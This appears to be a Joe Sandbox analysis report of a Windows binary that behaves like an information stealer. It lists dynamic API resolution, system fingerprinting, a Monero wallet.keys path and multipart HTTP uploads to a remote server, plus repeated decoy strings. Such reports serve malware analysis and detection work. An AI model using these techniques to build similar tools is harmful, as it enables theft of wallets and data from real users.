API calls 14459->14460 14461 bc418f 14460->14461 14462 bc45c0 2 API calls 14461->14462 14463 bc41a8 14462->14463 14464 bc45c0 2 API calls 14463->14464 14465 bc41c1 14464->14465 14466 bc45c0 2 API calls 14465->14466 14467 bc41da 14466->14467 14468 bc45c0 2 API calls 14467->14468 
14469 bc41f3 14468->14469 14470 bc45c0 2 API calls 14469->14470 14471 bc420c 14470->14471 14472 bc45c0 2 API calls 14471->14472 14473 bc4225 14472->14473 14474 bc45c0 2 API calls 14473->14474 14475 bc423e 14474->14475 14476 bc45c0 2 API calls 14475->14476 14477 bc4257 14476->14477 14478 bc45c0 2 API calls 14477->14478 14479 bc4270 14478->14479 14480 bc45c0 2 API calls 14479->14480 14481 bc4289 14480->14481 14482 bc45c0 2 API calls 14481->14482 14483 bc42a2 14482->14483 14484 bc45c0 2 API calls 14483->14484 14485 bc42bb 14484->14485 14486 bc45c0 2 API calls 14485->14486 14487 bc42d4 14486->14487 14488 bc45c0 2 API calls 14487->14488 14489 bc42ed 14488->14489 14490 bc45c0 2 API calls 14489->14490 14491 bc4306 14490->14491 14492 bc45c0 2 API calls 14491->14492 14493 bc431f 14492->14493 14494 bc45c0 2 API calls 14493->14494 14495 bc4338 14494->14495 14496 bc45c0 2 API calls 14495->14496 14497 bc4351 14496->14497 14498 bc45c0 2 API calls 14497->14498 14499 bc436a 14498->14499 14500 bc45c0 2 API calls 14499->14500 14501 bc4383 14500->14501 14502 bc45c0 2 API calls 14501->14502 14503 bc439c 14502->14503 14504 bc45c0 2 API calls 14503->14504 14505 bc43b5 14504->14505 14506 bc45c0 2 API calls 14505->14506 14507 bc43ce 14506->14507 14508 bc45c0 2 API calls 14507->14508 14509 bc43e7 14508->14509 14510 bc45c0 2 API calls 14509->14510 14511 bc4400 14510->14511 14512 bc45c0 2 API calls 14511->14512 14513 bc4419 14512->14513 14514 bc45c0 2 API calls 14513->14514 14515 bc4432 14514->14515 14516 bc45c0 2 API calls 14515->14516 14517 bc444b 14516->14517 14518 bc45c0 2 API calls 14517->14518 14519 bc4464 14518->14519 14520 bc45c0 2 API calls 14519->14520 14521 bc447d 14520->14521 14522 bc45c0 2 API calls 14521->14522 14523 bc4496 14522->14523 14524 bc45c0 2 API calls 14523->14524 14525 bc44af 14524->14525 14526 bc45c0 2 API calls 14525->14526 14527 bc44c8 14526->14527 14528 bc45c0 2 API calls 14527->14528 14529 bc44e1 14528->14529 14530 bc45c0 2 API calls 14529->14530 14531 bc44fa 
14530->14531 14532 bc45c0 2 API calls 14531->14532 14533 bc4513 14532->14533 14534 bc45c0 2 API calls 14533->14534 14535 bc452c 14534->14535 14536 bc45c0 2 API calls 14535->14536 14537 bc4545 14536->14537 14538 bc45c0 2 API calls 14537->14538 14539 bc455e 14538->14539 14540 bc45c0 2 API calls 14539->14540 14541 bc4577 14540->14541 14542 bc45c0 2 API calls 14541->14542 14543 bc4590 14542->14543 14544 bc45c0 2 API calls 14543->14544 14545 bc45a9 14544->14545 14546 bd9c10 14545->14546 14547 bda036 8 API calls 14546->14547 14548 bd9c20 43 API calls 14546->14548 14549 bda0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14547->14549 14550 bda146 14547->14550 14548->14547 14549->14550 14551 bda216 14550->14551 14552 bda153 8 API calls 14550->14552 14553 bda21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14551->14553 14554 bda298 14551->14554 14552->14551 14553->14554 14555 bda2a5 6 API calls 14554->14555 14556 bda337 14554->14556 14555->14556 14557 bda41f 14556->14557 14558 bda344 9 API calls 14556->14558 14559 bda428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14557->14559 14560 bda4a2 14557->14560 14558->14557 14559->14560 14561 bda4dc 14560->14561 14562 bda4ab GetProcAddress GetProcAddress 14560->14562 14563 bda515 14561->14563 14564 bda4e5 GetProcAddress GetProcAddress 14561->14564 14562->14561 14565 bda612 14563->14565 14566 bda522 10 API calls 14563->14566 14564->14563 14567 bda67d 14565->14567 14568 bda61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14565->14568 14566->14565 14569 bda69e 14567->14569 14570 bda686 GetProcAddress 14567->14570 14568->14567 14571 bd5ca3 14569->14571 14572 bda6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14569->14572 14570->14569 14573 bc1590 14571->14573 14572->14571 15694 bc1670 14573->15694 14576 bda7a0 lstrcpy 14577 bc15b5 14576->14577 14578 bda7a0 lstrcpy 14577->14578 14579 bc15c7 14578->14579 14580 bda7a0 
lstrcpy 14579->14580 14581 bc15d9 14580->14581 14582 bda7a0 lstrcpy 14581->14582 14583 bc1663 14582->14583 14584 bd5510 14583->14584 14585 bd5521 14584->14585 14586 bda820 2 API calls 14585->14586 14587 bd552e 14586->14587 14588 bda820 2 API calls 14587->14588 14589 bd553b 14588->14589 14590 bda820 2 API calls 14589->14590 14591 bd5548 14590->14591 14592 bda740 lstrcpy 14591->14592 14593 bd5555 14592->14593 14594 bda740 lstrcpy 14593->14594 14595 bd5562 14594->14595 14596 bda740 lstrcpy 14595->14596 14597 bd556f 14596->14597 14598 bda740 lstrcpy 14597->14598 14609 bd557c 14598->14609 14599 bda740 lstrcpy 14599->14609 14600 bd5643 StrCmpCA 14600->14609 14601 bd56a0 StrCmpCA 14602 bd57dc 14601->14602 14601->14609 14603 bda8a0 lstrcpy 14602->14603 14604 bd57e8 14603->14604 14605 bda820 2 API calls 14604->14605 14607 bd57f6 14605->14607 14606 bda820 lstrlen lstrcpy 14606->14609 14610 bda820 2 API calls 14607->14610 14608 bd5856 StrCmpCA 14608->14609 14611 bd5991 14608->14611 14609->14599 14609->14600 14609->14601 14609->14606 14609->14608 14618 bd5a0b StrCmpCA 14609->14618 14619 bd52c0 25 API calls 14609->14619 14623 bda8a0 lstrcpy 14609->14623 14632 bd578a StrCmpCA 14609->14632 14634 bda7a0 lstrcpy 14609->14634 14635 bd593f StrCmpCA 14609->14635 14636 bd51f0 20 API calls 14609->14636 14637 bc1590 lstrcpy 14609->14637 14613 bd5805 14610->14613 14612 bda8a0 lstrcpy 14611->14612 14614 bd599d 14612->14614 14615 bc1670 lstrcpy 14613->14615 14616 bda820 2 API calls 14614->14616 14638 bd5811 14615->14638 14617 bd59ab 14616->14617 14620 bda820 2 API calls 14617->14620 14621 bd5a28 14618->14621 14622 bd5a16 Sleep 14618->14622 14619->14609 14624 bd59ba 14620->14624 14625 bda8a0 lstrcpy 14621->14625 14622->14609 14623->14609 14626 bc1670 lstrcpy 14624->14626 14627 bd5a34 14625->14627 14626->14638 14628 bda820 2 API calls 14627->14628 14629 bd5a43 14628->14629 14630 bda820 2 API calls 14629->14630 14631 bd5a52 14630->14631 14633 bc1670 lstrcpy 14631->14633 14632->14609 
14633->14638 14634->14609 14635->14609 14636->14609 14637->14609 14638->13691 14640 bd754c 14639->14640 14641 bd7553 GetVolumeInformationA 14639->14641 14640->14641 14642 bd7591 14641->14642 14643 bd75fc GetProcessHeap RtlAllocateHeap 14642->14643 14644 bd7619 14643->14644 14645 bd7628 wsprintfA 14643->14645 14646 bda740 lstrcpy 14644->14646 14647 bda740 lstrcpy 14645->14647 14648 bd5da7 14646->14648 14647->14648 14648->13712 14650 bda7a0 lstrcpy 14649->14650 14651 bc4899 14650->14651 15703 bc47b0 14651->15703 14653 bc48a5 14654 bda740 lstrcpy 14653->14654 14655 bc48d7 14654->14655 14656 bda740 lstrcpy 14655->14656 14657 bc48e4 14656->14657 14658 bda740 lstrcpy 14657->14658 14659 bc48f1 14658->14659 14660 bda740 lstrcpy 14659->14660 14661 bc48fe 14660->14661 14662 bda740 lstrcpy 14661->14662 14663 bc490b InternetOpenA StrCmpCA 14662->14663 14664 bc4944 14663->14664 14665 bc4ecb InternetCloseHandle 14664->14665 15709 bd8b60 14664->15709 14667 bc4ee8 14665->14667 15724 bc9ac0 CryptStringToBinaryA 14667->15724 14668 bc4963 15717 bda920 14668->15717 14671 bc4976 14672 bda8a0 lstrcpy 14671->14672 14678 bc497f 14672->14678 14674 bda820 2 API calls 14675 bc4f05 14674->14675 14676 bda9b0 4 API calls 14675->14676 14679 bc4f1b 14676->14679 14677 bc4f27 codecvt 14680 bda7a0 lstrcpy 14677->14680 14682 bda9b0 4 API calls 14678->14682 14681 bda8a0 lstrcpy 14679->14681 14693 bc4f57 14680->14693 14681->14677 14683 bc49a9 14682->14683 14684 bda8a0 lstrcpy 14683->14684 14685 bc49b2 14684->14685 14686 bda9b0 4 API calls 14685->14686 14687 bc49d1 14686->14687 14688 bda8a0 lstrcpy 14687->14688 14689 bc49da 14688->14689 14690 bda920 3 API calls 14689->14690 14691 bc49f8 14690->14691 14692 bda8a0 lstrcpy 14691->14692 14694 bc4a01 14692->14694 14693->13715 14695 bda9b0 4 API calls 14694->14695 14696 bc4a20 14695->14696 14697 bda8a0 lstrcpy 14696->14697 14698 bc4a29 14697->14698 14699 bda9b0 4 API calls 14698->14699 14700 bc4a48 14699->14700 14701 bda8a0 lstrcpy 14700->14701 14702 bc4a51 
14701->14702 14703 bda9b0 4 API calls 14702->14703 14704 bc4a7d 14703->14704 14705 bda920 3 API calls 14704->14705 14706 bc4a84 14705->14706 14707 bda8a0 lstrcpy 14706->14707 14708 bc4a8d 14707->14708 14709 bc4aa3 InternetConnectA 14708->14709 14709->14665 14710 bc4ad3 HttpOpenRequestA 14709->14710 14712 bc4ebe InternetCloseHandle 14710->14712 14713 bc4b28 14710->14713 14712->14665 14714 bda9b0 4 API calls 14713->14714 14715 bc4b3c 14714->14715 14716 bda8a0 lstrcpy 14715->14716 14717 bc4b45 14716->14717 14718 bda920 3 API calls 14717->14718 14719 bc4b63 14718->14719 14720 bda8a0 lstrcpy 14719->14720 14721 bc4b6c 14720->14721 14722 bda9b0 4 API calls 14721->14722 14723 bc4b8b 14722->14723 14724 bda8a0 lstrcpy 14723->14724 14725 bc4b94 14724->14725 14726 bda9b0 4 API calls 14725->14726 14727 bc4bb5 14726->14727 14728 bda8a0 lstrcpy 14727->14728 14729 bc4bbe 14728->14729 14730 bda9b0 4 API calls 14729->14730 14731 bc4bde 14730->14731 14732 bda8a0 lstrcpy 14731->14732 14733 bc4be7 14732->14733 14734 bda9b0 4 API calls 14733->14734 14735 bc4c06 14734->14735 14736 bda8a0 lstrcpy 14735->14736 14737 bc4c0f 14736->14737 14738 bda920 3 API calls 14737->14738 14739 bc4c2d 14738->14739 14740 bda8a0 lstrcpy 14739->14740 14741 bc4c36 14740->14741 14742 bda9b0 4 API calls 14741->14742 14743 bc4c55 14742->14743 14744 bda8a0 lstrcpy 14743->14744 14745 bc4c5e 14744->14745 14746 bda9b0 4 API calls 14745->14746 14747 bc4c7d 14746->14747 14748 bda8a0 lstrcpy 14747->14748 14749 bc4c86 14748->14749 14750 bda920 3 API calls 14749->14750 14751 bc4ca4 14750->14751 14752 bda8a0 lstrcpy 14751->14752 14753 bc4cad 14752->14753 14754 bda9b0 4 API calls 14753->14754 14755 bc4ccc 14754->14755 14756 bda8a0 lstrcpy 14755->14756 14757 bc4cd5 14756->14757 14758 bda9b0 4 API calls 14757->14758 14759 bc4cf6 14758->14759 14760 bda8a0 lstrcpy 14759->14760 14761 bc4cff 14760->14761 14762 bda9b0 4 API calls 14761->14762 14763 bc4d1f 14762->14763 14764 bda8a0 lstrcpy 14763->14764 14765 bc4d28 14764->14765 
14766 bda9b0 4 API calls 14765->14766 14767 bc4d47 14766->14767 14768 bda8a0 lstrcpy 14767->14768 14769 bc4d50 14768->14769 14770 bda920 3 API calls 14769->14770 14771 bc4d6e 14770->14771 14772 bda8a0 lstrcpy 14771->14772 14773 bc4d77 14772->14773 14774 bda740 lstrcpy 14773->14774 14775 bc4d92 14774->14775 14776 bda920 3 API calls 14775->14776 14777 bc4db3 14776->14777 14778 bda920 3 API calls 14777->14778 14779 bc4dba 14778->14779 14780 bda8a0 lstrcpy 14779->14780 14781 bc4dc6 14780->14781 14782 bc4de7 lstrlen 14781->14782 14783 bc4dfa 14782->14783 14784 bc4e03 lstrlen 14783->14784 15723 bdaad0 14784->15723 14786 bc4e13 HttpSendRequestA 14787 bc4e32 InternetReadFile 14786->14787 14788 bc4e67 InternetCloseHandle 14787->14788 14793 bc4e5e 14787->14793 14791 bda800 14788->14791 14790 bda9b0 4 API calls 14790->14793 14791->14712 14792 bda8a0 lstrcpy 14792->14793 14793->14787 14793->14788 14793->14790 14793->14792 15730 bdaad0 14794->15730 14796 bd17c4 StrCmpCA 14797 bd17cf ExitProcess 14796->14797 14808 bd17d7 14796->14808 14798 bd19c2 14798->13717 14799 bd185d StrCmpCA 14799->14808 14800 bd187f StrCmpCA 14800->14808 14801 bd18f1 StrCmpCA 14801->14808 14802 bd1951 StrCmpCA 14802->14808 14803 bd1970 StrCmpCA 14803->14808 14804 bd1913 StrCmpCA 14804->14808 14805 bd1932 StrCmpCA 14805->14808 14806 bd18ad StrCmpCA 14806->14808 14807 bd18cf StrCmpCA 14807->14808 14808->14798 14808->14799 14808->14800 14808->14801 14808->14802 14808->14803 14808->14804 14808->14805 14808->14806 14808->14807 14809 bda820 lstrlen lstrcpy 14808->14809 14809->14808 14811 bda7a0 lstrcpy 14810->14811 14812 bc5979 14811->14812 14813 bc47b0 2 API calls 14812->14813 14814 bc5985 14813->14814 14815 bda740 lstrcpy 14814->14815 14816 bc59ba 14815->14816 14817 bda740 lstrcpy 14816->14817 14818 bc59c7 14817->14818 14819 bda740 lstrcpy 14818->14819 14820 bc59d4 14819->14820 14821 bda740 lstrcpy 14820->14821 14822 bc59e1 14821->14822 14823 bda740 lstrcpy 14822->14823 14824 bc59ee InternetOpenA StrCmpCA 

                    Control-flow Graph for the function starting at bd9860 (graph image not reproduced; Executed / Not Executed legend omitted)
                    APIs
                    • GetProcAddress.KERNEL32(74DD0000,013C2368), ref: 00BD98A1
                    • GetProcAddress.KERNEL32(74DD0000,013C24D0), ref: 00BD98BA
                    • GetProcAddress.KERNEL32(74DD0000,013C2338), ref: 00BD98D2
                    • GetProcAddress.KERNEL32(74DD0000,013C2500), ref: 00BD98EA
                    • GetProcAddress.KERNEL32(74DD0000,013C23E0), ref: 00BD9903
                    • GetProcAddress.KERNEL32(74DD0000,013C8FB8), ref: 00BD991B
                    • GetProcAddress.KERNEL32(74DD0000,013B5DF0), ref: 00BD9933
                    • GetProcAddress.KERNEL32(74DD0000,013B5BD0), ref: 00BD994C
                    • GetProcAddress.KERNEL32(74DD0000,013C2308), ref: 00BD9964
                    • GetProcAddress.KERNEL32(74DD0000,013C2248), ref: 00BD997C
                    • GetProcAddress.KERNEL32(74DD0000,013C2410), ref: 00BD9995
                    • GetProcAddress.KERNEL32(74DD0000,013C2278), ref: 00BD99AD
                    • GetProcAddress.KERNEL32(74DD0000,013B5AF0), ref: 00BD99C5
                    • GetProcAddress.KERNEL32(74DD0000,013C23F8), ref: 00BD99DE
                    • GetProcAddress.KERNEL32(74DD0000,013C2470), ref: 00BD99F6
                    • GetProcAddress.KERNEL32(74DD0000,013B5BF0), ref: 00BD9A0E
                    • GetProcAddress.KERNEL32(74DD0000,013C24B8), ref: 00BD9A27
                    • GetProcAddress.KERNEL32(74DD0000,013C22A8), ref: 00BD9A3F
                    • GetProcAddress.KERNEL32(74DD0000,013B5E10), ref: 00BD9A57
                    • GetProcAddress.KERNEL32(74DD0000,013C22D8), ref: 00BD9A70
                    • GetProcAddress.KERNEL32(74DD0000,013B5B50), ref: 00BD9A88
                    • LoadLibraryA.KERNEL32(013C25A8,?,00BD6A00), ref: 00BD9A9A
                    • LoadLibraryA.KERNEL32(013C25C0,?,00BD6A00), ref: 00BD9AAB
                    • LoadLibraryA.KERNEL32(013C2530,?,00BD6A00), ref: 00BD9ABD
                    • LoadLibraryA.KERNEL32(013C2560,?,00BD6A00), ref: 00BD9ACF
                    • LoadLibraryA.KERNEL32(013C2548,?,00BD6A00), ref: 00BD9AE0
                    • GetProcAddress.KERNEL32(75A70000,013C25D8), ref: 00BD9B02
                    • GetProcAddress.KERNEL32(75290000,013C2518), ref: 00BD9B23
                    • GetProcAddress.KERNEL32(75290000,013C2578), ref: 00BD9B3B
                    • GetProcAddress.KERNEL32(75BD0000,013C2590), ref: 00BD9B5D
                    • GetProcAddress.KERNEL32(75450000,013B5B10), ref: 00BD9B7E
                    • GetProcAddress.KERNEL32(76E90000,013C9008), ref: 00BD9B9F
                    • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00BD9BB6
                    Strings
                    • NtQueryInformationProcess, xrefs: 00BD9BAA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$LibraryLoad
                    • String ID: NtQueryInformationProcess
                    • API String ID: 2238633743-2781105232
                    • Opcode ID: db32073bff4343b8057715e6bc16e648daf954875e98fba18ec33a2a55c7f207
                    • Instruction ID: 30329abe89334b064a79ee49ac01023e2fb57f49d147213ce8535b8aceef4820
                    • Opcode Fuzzy Hash: db32073bff4343b8057715e6bc16e648daf954875e98fba18ec33a2a55c7f207
                    • Instruction Fuzzy Hash: AEA11DB55103489FD348EFAAFD8895637F9F74C30171C853BA605A3268D63B98C9CB62

                    Control-flow Graph for the function starting at bc45c0 (graph image not reproduced; Executed / Not Executed legend omitted)
                    APIs
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BC460F
                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00BC479C
                    Strings
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (one string, referenced 25 times in this function), xrefs: 00BC45C7, 00BC45DD, 00BC45E8, 00BC45F3, 00BC4617, 00BC4622, 00BC462D, 00BC4638, 00BC4643, 00BC4657, 00BC4662, 00BC466D, 00BC4678, 00BC46AC, 00BC46B7, 00BC46C2, 00BC4713, 00BC4729, 00BC4734, 00BC473F, 00BC474F, 00BC475A, 00BC4765, 00BC4770, 00BC477B
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BC46CD
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BC471E
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BC46D8
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BC4683
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BC45D2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeapProtectVirtual
                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                    • API String ID: 1542196881-2218711628
                    • Opcode ID: 5ebace756687896666dd40f4425e807e7e10d5c542b9374ecaa73d3b423f3c1f
                    • Instruction ID: b8fb7015d1995c40c75974fe1928753319325907d2352396aae2477e7e3cbc95
                    • Opcode Fuzzy Hash: 5ebace756687896666dd40f4425e807e7e10d5c542b9374ecaa73d3b423f3c1f
                    • Instruction Fuzzy Hash: 39413728FD268C6AC734FBA589EEE9D73D35F4A704F5050C4AE2253293CBB0650047B6

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00BDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BDA7E6
                      • Part of subcall function 00BC47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BC4839
                      • Part of subcall function 00BC47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BC4849
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00BC4915
                    • StrCmpCA.SHLWAPI(?,013CEA08), ref: 00BC493A
                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BC4ABA
                    • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00BE0DDB,00000000,?,?,00000000,?,",00000000,?,013CEA48), ref: 00BC4DE8
                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00BC4E04
                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00BC4E18
                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00BC4E49
                    • InternetCloseHandle.WININET(00000000), ref: 00BC4EAD
                    • InternetCloseHandle.WININET(00000000), ref: 00BC4EC5
                    • HttpOpenRequestA.WININET(00000000,013CEA18,?,013CDFD8,00000000,00000000,00400100,00000000), ref: 00BC4B15
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                      • Part of subcall function 00BDA920: lstrcpy.KERNEL32(00000000,?), ref: 00BDA972
                      • Part of subcall function 00BDA920: lstrcat.KERNEL32(00000000), ref: 00BDA982
                    • InternetCloseHandle.WININET(00000000), ref: 00BC4ECF
                    Strings
                    Yara matches
                    Similarity
                    • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                    • String ID: "$"$------$------$------$de-DE
                    • API String ID: 460715078-1932956479
                    • Opcode ID: dfca944423403a9a136e75405b38861f87654e0910df38c24a3c16eaadb8cf38
                    • Instruction ID: 29d7799ec638c26bed051fb17e9916ae7352c95e952ad2cb440b9b2366b9c72f
                    • Opcode Fuzzy Hash: dfca944423403a9a136e75405b38861f87654e0910df38c24a3c16eaadb8cf38
                    • Instruction Fuzzy Hash: 1812FB71910258AADB15EB90DCA2FEEF3B8AF14300F5041EAB50672191EF752F49CF66
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BD7910
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BD7917
                    • GetComputerNameA.KERNEL32(?,00000104), ref: 00BD792F
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateComputerNameProcess
                    • String ID:
                    • API String ID: 1664310425-0
                    • Opcode ID: e1be05b54c7224dd7c4f3fb5192b8b20607fe20903b4b755d22da84ed34a24f6
                    • Instruction ID: 5c42d4eac2b93cbe2066d4241644b16d2cdbd253704f38935266394995df3389
